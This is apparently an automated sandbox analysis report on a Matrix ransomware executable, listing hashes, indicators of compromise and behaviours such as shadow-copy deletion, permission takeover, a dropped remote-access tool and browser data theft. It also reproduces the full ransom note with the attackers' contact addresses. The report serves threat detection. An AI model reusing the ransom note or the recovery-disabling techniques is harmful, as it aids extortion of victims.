matrix | 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95

Analysis

max time kernel
129s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
13-07-2023 23:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MatrixRansomware.exe
Size

1.2MB
MD5

a93bd199d34d21cc9102600c6ce782cf
SHA1

31b50d84aa1af4f0e76a523382caba476f6e45dc
SHA256

242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95
SHA512

642e0cacf80a54ffa8f1bdeebb2a9b9449bb062bc331924ff8b6c93853ade68cdbd23928081d7c5da7bce944f5c553b0c4b05bd90fda525f017415bd891534c2
SSDEEP

24576:NykKxXJdZiDTrfJR5ez1888K0aNE1eXTBoAlK/u95ByxXEfui:N8bcLK+KzlK/udyh/i

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Path

C:\Program Files\Google\Chrome\Application\106.0.5249.119\default_apps\#README_EMAN#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 1B5F69C1AEAC538E\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 1B5F69C1AEAC538E\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 A1fPHNau\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

MatrixRansomware.exe

description	ioc	process
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pl\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\46be7tph.default-release\startupCache\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gu\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\he\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ru\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cookie\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MEIPreload\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Adobe\Color\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2bbc526a-cb2b-449f-9a33-895178eeb08e}\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ne-NP\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Protect\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\af\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\et\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mn\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\Contacts\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\9E594810-A9E8-4FC9-A91E-B96B5BBD8E26\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gl\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\Settings\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\vi\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000163\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-TW\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick.2\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\prs-AF\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jre1.8.0_66\lib\jfr\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\fr\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sd-Arab-PK\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\TokenBroker\Cache\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\All Users\Microsoft\Diagnosis\ScenariosSqlStore\#README_EMAN#.rtf	MatrixRansomware.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exe

pid process

5668 bcdedit.exe
Blocklisted process makes network request 4 IoCs

Processes:

cmd.exe

flow pid process

385 3432 cmd.exe
443 3432 cmd.exe
448 3432 cmd.exe
477 3432 cmd.exe
Drops file in Drivers directory 1 IoCs

Processes:

OllakRAT64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS OllakRAT64.exe

pid	process
5668	bcdedit.exe

flow	pid	process
385	3432	cmd.exe
443	3432	cmd.exe
448	3432	cmd.exe
477	3432	cmd.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	OllakRAT64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

OllakRAT64.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	OllakRAT64.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

wscript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation wscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 64 IoCs

Processes:

NW1RVsE0.exeOllakRAT.exeOllakRAT64.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.execmd.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.execmd.exeOllakRAT.exetakeown.exeOllakRAT.exeOllakRAT.exeOllakRAT.execmd.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.execmd.exeOllakRAT.execacls.exeOllakRAT.exeOllakRAT.execmd.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeOllakRAT.exeConhost.exeOllakRAT.exeOllakRAT.execmd.exeOllakRAT.exeConhost.exeOllakRAT.exeOllakRAT.exetakeown.exeOllakRAT.exeOllakRAT.exe

pid	process
3204	NW1RVsE0.exe
3848	OllakRAT.exe
4476	OllakRAT64.exe
5308	OllakRAT.exe
4052	OllakRAT.exe
4416	OllakRAT.exe
4712	OllakRAT.exe
5152	OllakRAT.exe
1324	OllakRAT.exe
5720	OllakRAT.exe
4776	OllakRAT.exe
2580	OllakRAT.exe
3084	cmd.exe
5512	OllakRAT.exe
5884	OllakRAT.exe
2180	OllakRAT.exe
5804	OllakRAT.exe
5920	cmd.exe
4592	OllakRAT.exe
5436	takeown.exe
5800	OllakRAT.exe
5164	OllakRAT.exe
1508	OllakRAT.exe
1636	cmd.exe
5532	OllakRAT.exe
6040	OllakRAT.exe
3768	OllakRAT.exe
5644	OllakRAT.exe
5776	OllakRAT.exe
3216	OllakRAT.exe
2864	OllakRAT.exe
5512	OllakRAT.exe
5236	OllakRAT.exe
5968	OllakRAT.exe
3836	OllakRAT.exe
2404	OllakRAT.exe
4928	OllakRAT.exe
4796	OllakRAT.exe
3980	OllakRAT.exe
4036	cmd.exe
5784	OllakRAT.exe
5332	cacls.exe
6016	OllakRAT.exe
4336	OllakRAT.exe
5144	cmd.exe
5508	OllakRAT.exe
5208	OllakRAT.exe
3836	OllakRAT.exe
2688	OllakRAT.exe
5544	OllakRAT.exe
2076	OllakRAT.exe
5640	OllakRAT.exe
272	Conhost.exe
3804	OllakRAT.exe
4944	OllakRAT.exe
5320	cmd.exe
5400	OllakRAT.exe
3868	Conhost.exe
4088	OllakRAT.exe
4452	OllakRAT.exe
5940	takeown.exe
2296	OllakRAT.exe
5236	OllakRAT.exe
5448	OllakRAT.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
1324	takeown.exe
5332	takeown.exe
3324	takeown.exe
1636	takeown.exe
3608	takeown.exe
5488	takeown.exe
2180	takeown.exe
2380	takeown.exe
536	takeown.exe
4564	takeown.exe
6076	takeown.exe
5512	takeown.exe
5712	takeown.exe
6000	takeown.exe
1132	takeown.exe
5160	takeown.exe
5824	takeown.exe
5780	takeown.exe
5384	takeown.exe
4224	takeown.exe
5636	takeown.exe
5124	takeown.exe
5364	takeown.exe
4928	takeown.exe
5156	takeown.exe
2912	takeown.exe
2492	takeown.exe
5360	takeown.exe
2612	takeown.exe
5556	takeown.exe
5932	takeown.exe
5596	takeown.exe
5372	takeown.exe
3348	takeown.exe
4816	takeown.exe
5264	takeown.exe
1280	takeown.exe
3872	takeown.exe
3752	takeown.exe
6032	takeown.exe
940	takeown.exe
5208	takeown.exe
2932	takeown.exe
4448	takeown.exe
4576	takeown.exe
5584	takeown.exe
6020	takeown.exe
4952	takeown.exe
536	takeown.exe
5444	takeown.exe
6068	takeown.exe
4312	takeown.exe
5948	takeown.exe
420	takeown.exe
2444	takeown.exe
660	takeown.exe
6132	takeown.exe
940	takeown.exe
2488	takeown.exe
1616	takeown.exe
5932	takeown.exe
5376	takeown.exe
4952	takeown.exe
2044	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/3848-620-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/5308-2456-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/4052-2638-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/4416-3688-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/4416-3691-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/4712-3827-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/3848-3881-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/4712-3919-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/5152-4695-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/1324-4735-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/5720-5029-0x0000000000400000-0x0000000000477000-memory.dmp	upx
